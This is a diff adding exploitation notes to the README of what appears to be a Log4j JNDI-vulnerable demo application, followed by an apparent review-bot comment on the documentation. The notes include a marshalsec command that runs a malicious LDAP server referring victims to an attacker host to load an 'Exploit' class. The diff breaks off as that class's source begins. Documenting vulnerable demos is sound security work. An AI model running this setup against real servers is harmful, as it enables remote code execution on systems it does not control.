diff --git a/README.md b/README.md index a79966c..2029875 100644 --- a/README.md +++ b/README.md @@ -46,6 +46,36 @@ You will see the following stack trace in the application logs: at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172) ``` +## Note + +While this is enough to show the application is vulnerable, I do not have a full PoC yet. As explained in LunaSec's advisory, the exploitation steps should be: +* Use [MarshelSec](https://github.com/mbechler/marshalsec) to run a malicious LDAP server: + +``` +java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-local-ip:8888/#Exploit" +``` + +* Generate `Exploit.class` as follows: + +``` +cat >> Exploit.java <
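Review bot: The new "## Note" section cites "LunaSec's advisory" without a link and presents steps the author says are not yet a full PoC, so a reader cannot tell which parts were actually run against this application; link the advisory and mark the steps as untested until they have been verified. In the first bullet the link text "MarshelSec" misspells the project, which the URL and the command both spell "marshalsec". The visible `cat >> Exploit.java` appends to the file, so running the step a second time leaves duplicated source in `Exploit.java`; `cat >` would make the step repeatable. The heading "## Note" says nothing about the section's content, and the added code fences carry no language tag while holding shell commands.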